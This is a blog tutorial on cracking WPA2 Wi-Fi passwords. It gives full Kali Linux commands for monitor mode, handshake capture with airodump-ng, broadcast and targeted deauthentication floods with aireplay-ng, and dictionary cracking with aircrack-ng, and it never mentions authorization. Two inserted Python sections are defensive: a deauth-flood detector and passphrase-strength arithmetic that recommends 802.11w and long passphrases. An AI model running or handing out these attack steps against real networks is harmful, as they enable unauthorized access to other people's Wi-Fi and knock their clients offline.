How to Hack WPA2 WiFi Password with Aircrack-ng

Hello geeks, how are you? I hope you are having fun learning new things from our one and only teacher, Google 😀. In this post I will show you how to hack a WPA2 Wi-Fi password with Aircrack-ng, so let's get into it. What we need is Kali Linux, which ships with everything required for this attack to succeed. Here is an article you can read to learn more about

Kali Linux: https://securitytraning.com/what-is-kali-linux/

So let's begin with the real process. To crack the Wi-Fi you need a computer running Kali Linux with a Wi-Fi card that supports monitor mode. If the internal card of your computer/laptop does not, you will need an external Wi-Fi adapter that can run in monitor mode. Here are some recommended chipsets that support monitor mode:

  1. Atheros AR9271 – IEEE 802.11b/g/n
  2. Ralink RT3070 – IEEE 802.11b/g/n
  3. Realtek RTL8187L – IEEE 802.11b/g

Compatible Wi-Fi Adapters:

  1. Atheros AR9271 chipset
    1. Alfa AWUS036NHA – $28.97
    2. TP-LINK TL-WN722N or TL-WN722NC – $15.99
  2. Ralink RT3070
    1. Alfa AWUS036NH – (Bigger size) $27.99
    2. Alfa AWUS036NEH – (Smaller size) $21.97
  3. Realtek RTL8187L
    1. AWUS036H – (Bigger size) $24.99
    2. AWUS036EW – (Smaller size) $19.97

Besides the hardware, we will need a wordlist, which is used to crack the password from the captured handshake.

Read this to create your wordlist: https://securitytraning.com/creating-custom-dictionary-files-word-list-using-cewl-brute-force/

How Wi-Fi Works

Before we get into the hacking part, let's look at how Wi-Fi works, because that matters here. Wi-Fi transmits data over the air in the form of packets (frames), and that is how the computers on the network talk to each other.

This video explains how Wi-Fi works in an easy way.

How This Works

We will capture all the packets in the air using airodump-ng. Then we check whether anyone is connected to the target Wi-Fi network: if no client is connected, this will not work, because we need a WPA handshake, and a handshake is only exchanged when a client (re)connects. We force one by sending deauthentication packets to a user connected to the Wi-Fi, so that the client reconnects and we capture the handshake. Once we have it, we use aircrack-ng to crack the password offline against a wordlist.

Step 0: Installing The Latest Aircrack-ng

Install required dependencies:

$ sudo apt-get install build-essential libssl-dev libnl-3-dev pkg-config libnl-genl-3-dev

Downloading and installing Aircrack-ng:

$ wget http://download.aircrack-ng.org/aircrack-ng-1.2-rc1.tar.gz -O - | tar -xz
$ cd aircrack-ng-1.2-rc1
$ sudo make
$ sudo make install

Be sure to check that the version of aircrack-ng is up-to-date because you may see problems with older versions.

$ aircrack-ng --help | head -3

Step 1:

Power up your computer and open a terminal. We need to know the name of the wireless adapter connected to the computer, since there may be several adapters attached to it.

Command for that:

$ iwconfig

As you can see, the Wi-Fi adapter is named wlan0. It may be different for you.

Step 2: Start the Wireless Interface in Monitor Mode

In this step we first check whether monitor mode can be enabled on the wireless card without problems, because in some cases other processes (for example NetworkManager or wpa_supplicant) conflict with it. `airmon-ng check` lists those processes, and `airmon-ng check kill` terminates them:

$ sudo airmon-ng check kill

Starting monitor mode on the wireless interface:

$ sudo airmon-ng start wlan0

After that, monitor mode is enabled on the wireless interface. Note that older versions of aircrack-ng create a separate interface named mon0 (used in the rest of this guide), while newer versions switch the card itself into monitor mode and name it wlan0mon; run iwconfig again and use whatever interface name you see.

Step 3: Start Airodump-ng to Collect Authentication Handshake

Now comes the important part. Since monitor mode is enabled on our wireless card, we can see all the wireless traffic in the air.

Here is how we do that:

$ sudo airodump-ng mon0

All of the access points are listed in the upper part of the screen and the clients are listed at the bottom:

CH 1 ][ Elapsed: 20 s ][ 2014-05-29 12:46

BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

00:11:22:33:44:55  -48      212     1536   66   1  54e  WPA2 CCMP   PSK  CrackMe
66:77:88:99:00:11  -64      134     345   34   1  54e  WPA2 CCMP   PSK  SomeAP

BSSID              STATION            PWR   Rate    Lost    Frames  Probe

00:11:22:33:44:55  AA:BB:CC:DD:EE:FF  -44    0 - 1    114       56
00:11:22:33:44:55  GG:HH:II:JJ:KK:LL  -78    0 - 1      0       1
66:77:88:99:00:11  MM:NN:OO:PP:QQ:RR  -78    2 - 32      0       1

Now we run airodump-ng on the channel of the AP we want to attack, filtered by its BSSID, so that only the handshake for the target access point is collected.

$ sudo airodump-ng -c 1 --bssid 00:11:22:33:44:55 -w WPAcrack mon0 --ignore-negative-one

Option                 Description
-c                     The channel of the wireless network
--bssid                The MAC address of the access point
-w                     The file name prefix for the capture file that will contain the authentication handshake
mon0                   The wireless interface
--ignore-negative-one  Suppresses the 'fixed channel : -1' message

Step 4: Use Aireplay-ng to Deauthenticate the Wireless Client

This step is optional: if you wait long enough for a client to connect, the handshake will be captured without it. Otherwise, in this step we send the client connected to the Wi-Fi network a message telling it that it is no longer connected to the AP. Naturally the client will try to reconnect, and we capture the authentication handshake when it does.

Send DeAuth to broadcast:

$ sudo aireplay-ng --deauth 100 -a 00:11:22:33:44:55 mon0 --ignore-negative-one

Send directed DeAuth (the attack is more effective when it is targeted):

$ sudo aireplay-ng --deauth 100 -a [MAC ADDRESS OF AP] -c [MAC ADDRESS OF CLIENT] mon0 --ignore-negative-one

Option                 Description
--deauth 100           The number of deauthentication frames you want to send (0 for unlimited)
-a                     The MAC address of the access point
-c                     The MAC address of the client
mon0                   The wireless interface
--ignore-negative-one  Suppresses the 'fixed channel : -1' message
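The deauthentication burst described in this step is exactly what a wireless IDS looks for, and what 802.11w (Protected Management Frames) exists to block. As an added example that is not part of the original post, here is a small detector that parses the fixed 802.11 MAC header, counts deauthentication and disassociation frames per BSSID inside a sliding time window, and raises an alert when the count reaches a threshold. The capture it runs on is constructed inline (the MAC addresses reuse the placeholder values from the post); the window and threshold are assumptions you would tune to your own environment.

```python
"""Deauth-flood detector over raw 802.11 frames (added example, not the post's code)."""
import struct
from collections import defaultdict

TYPE_MGMT = 0          # frame type 0 = management
SUBTYPE_DISASSOC = 10  # management subtype 10 = disassociation
SUBTYPE_DEAUTH = 12    # management subtype 12 = deauthentication
BROADCAST = "ff:ff:ff:ff:ff:ff"


def mac_bytes(mac: str) -> bytes:
    return bytes(int(octet, 16) for octet in mac.split(":"))


def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def parse_80211_header(frame: bytes):
    """Return (type, subtype, addr1, addr2, addr3) for a raw 802.11 frame with no
    radiotap header, or None if it is shorter than the 24-byte fixed MAC header.
    Frame control byte 0: bits 0-1 version, bits 2-3 type, bits 4-7 subtype."""
    if len(frame) < 24:
        return None
    fc0 = frame[0]
    ftype = (fc0 >> 2) & 0x3
    subtype = (fc0 >> 4) & 0xF
    return (ftype, subtype, mac_str(frame[4:10]),
            mac_str(frame[10:16]), mac_str(frame[16:22]))


def build_deauth(dst: str, src: str, bssid: str, reason: int = 7, seq: int = 0) -> bytes:
    """Construct a deauthentication frame; used here only to build the sample capture."""
    fc = bytes([(SUBTYPE_DEAUTH << 4) | (TYPE_MGMT << 2), 0x00])
    duration = struct.pack("<H", 314)
    seq_ctrl = struct.pack("<H", (seq & 0xFFF) << 4)
    return (fc + duration + mac_bytes(dst) + mac_bytes(src) + mac_bytes(bssid)
            + seq_ctrl + struct.pack("<H", reason))


def build_data_frame(dst: str, src: str, bssid: str, payload: bytes = b"\x00" * 8) -> bytes:
    """Construct a plain data frame (type 2) so the detector has traffic to ignore."""
    fc = bytes([0x08, 0x00])  # type 2 (data), subtype 0
    return fc + b"\x00\x00" + mac_bytes(dst) + mac_bytes(src) + mac_bytes(bssid) + b"\x00\x00" + payload


def detect_deauth_flood(frames, window_s: float = 1.0, threshold: int = 20):
    """frames: iterable of (timestamp_seconds, raw_frame).
    Returns one alert dict per BSSID whose deauth/disassoc count inside any
    window_s-second window reaches threshold (both values are assumptions)."""
    per_bssid = defaultdict(list)
    for ts, raw in frames:
        hdr = parse_80211_header(raw)
        if hdr is None:
            continue
        ftype, subtype, addr1, _addr2, addr3 = hdr
        if ftype == TYPE_MGMT and subtype in (SUBTYPE_DEAUTH, SUBTYPE_DISASSOC):
            per_bssid[addr3].append((ts, addr1))

    alerts = []
    for bssid, events in per_bssid.items():
        events.sort()
        times = [t for t, _ in events]
        start, best = 0, None
        for end in range(len(times)):          # sliding window over sorted timestamps
            while times[end] - times[start] > window_s:
                start += 1
            count = end - start + 1
            if count >= threshold and (best is None or count > best[0]):
                best = (count, times[start], times[end])
        if best is not None:
            alerts.append({
                "bssid": bssid,
                "count": best[0],
                "window_start": best[1],
                "window_end": best[2],
                "broadcast": any(a == BROADCAST for _, a in events),
                "targets": sorted({a for _, a in events if a != BROADCAST}),
            })
    return alerts


AP = "00:11:22:33:44:55"      # placeholder BSSID from the post
CLIENT = "aa:bb:cc:dd:ee:ff"  # placeholder client from the post


def sample_capture():
    """Constructed capture: one legitimate deauth at t=0, ordinary data traffic,
    then 100 broadcast deauths inside one second, like the burst in Step 4."""
    frames = [(0.0, build_deauth(CLIENT, AP, AP, reason=3))]
    for i in range(50):
        frames.append((0.5 + i * 0.05, build_data_frame(AP, CLIENT, AP)))
    for i in range(100):
        frames.append((5.0 + i * 0.01, build_deauth(BROADCAST, AP, AP, seq=i)))
    return frames


def run_sample():
    return detect_deauth_flood(sample_capture(), window_s=1.0, threshold=20)


if __name__ == "__main__":
    for alert in run_sample():
        print(alert)
```

A single deauth from an AP is normal (idle timeout, roaming), so the detector keys on rate rather than on any one frame; in a real deployment you would feed it frames from a monitor-mode capture and, more importantly, enable 802.11w on the AP so spoofed deauth frames are rejected in the first place.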

Step 5: Run Aircrack-ng to Crack WPA/WPA2-PSK

To crack WPA/WPA2-PSK, you need a password dictionary as input. You can download some dictionaries from here.

Crack the WPA/WPA2-PSK with the following command:

$ aircrack-ng -w wordlist.dic -b 00:11:22:33:44:55 WPAcrack.cap

Option        Description
-w            The name of the dictionary file
-b            The MAC address of the access point
WPAcrack.cap  The name of the capture file that contains the authentication handshake
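What aircrack-ng does with the wordlist is derive a key from every candidate and check it against the captured handshake, and the cost of each try is fixed by the WPA2 standard: the Pairwise Master Key is PBKDF2-HMAC-SHA1 over the passphrase, salted with the SSID, for 4096 iterations. As an added example that is not part of the original post, the following code derives the PMK with the standard library, checks it against the known-answer vector from IEEE 802.11i (passphrase "password", SSID "IEEE"), and turns the derivation cost into the thing a defender actually controls: how long a dictionary or brute-force run would take for a given passphrase length. The guess rate used for the table is an assumption for illustration, not a measured figure.

```python
"""WPA2-PSK key derivation and passphrase-strength arithmetic (added example, not the post's code)."""
import hashlib
import math
import time


def is_valid_passphrase(passphrase: str) -> bool:
    """WPA2 passphrases are 8 to 63 printable ASCII characters."""
    return 8 <= len(passphrase) <= 63 and all(32 <= ord(c) <= 126 for c in passphrase)


def wpa2_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 32 bytes), per IEEE 802.11i.
    The SSID is the salt, so the same passphrase yields a different PMK on another network."""
    if not is_valid_passphrase(passphrase):
        raise ValueError("WPA2 passphrase must be 8-63 printable ASCII characters")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("ascii"), ssid.encode("utf-8"), 4096, 32)


# Known-answer test vector from IEEE 802.11i Annex H.4.1
KAT_PASSPHRASE, KAT_SSID = "password", "IEEE"
KAT_PMK = bytes.fromhex("f42c6fc52df0ebef9ebb4b90b38a5f902e83fe1b135a70e23aed762e9710a12e")


def entropy_bits(alphabet_size: int, length: int) -> float:
    """Entropy of a passphrase chosen uniformly at random from alphabet_size**length."""
    return length * math.log2(alphabet_size)


def seconds_to_exhaust(alphabet_size: int, length: int, guesses_per_second: float) -> float:
    """Time to try every passphrase of this shape at the given PMK-derivation rate."""
    return alphabet_size ** length / guesses_per_second


def measure_guess_rate(ssid: str = "IEEE", samples: int = 20) -> float:
    """Single-core PBKDF2 throughput on this machine, in derivations per second."""
    t0 = time.perf_counter()
    for i in range(samples):
        hashlib.pbkdf2_hmac("sha1", f"candidate{i:04d}".encode(), ssid.encode(), 4096, 32)
    return samples / (time.perf_counter() - t0)


if __name__ == "__main__":
    assert wpa2_pmk(KAT_PASSPHRASE, KAT_SSID) == KAT_PMK
    print(f"local single-core rate: {measure_guess_rate():.0f} PMK/s")
    ASSUMED_RATE = 1_000_000  # assumption for illustration, not a measured cracking-rig figure
    shapes = [("8 lowercase letters", 26, 8), ("12 mixed printable", 95, 12), ("20 mixed printable", 95, 20)]
    for label, alphabet, length in shapes:
        years = seconds_to_exhaust(alphabet, length, ASSUMED_RATE) / (86400 * 365)
        print(f"{label}: {entropy_bits(alphabet, length):.0f} bits, "
              f"{years:.3g} years to exhaust at {ASSUMED_RATE:,} guesses/s")
```

The point of the table is that the handshake capture itself cannot be prevented by the victim beyond 802.11w and monitoring; what decides whether Step 5 ever finishes is the passphrase. A passphrase that is long and random enough to sit outside any wordlist makes the offline search infeasible regardless of how fast the attacker's hardware is.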

That was it. Here are the 2 videos you can watch for a full explanation of all the steps:

I hope you like it and will share it with your friends so they can learn new things.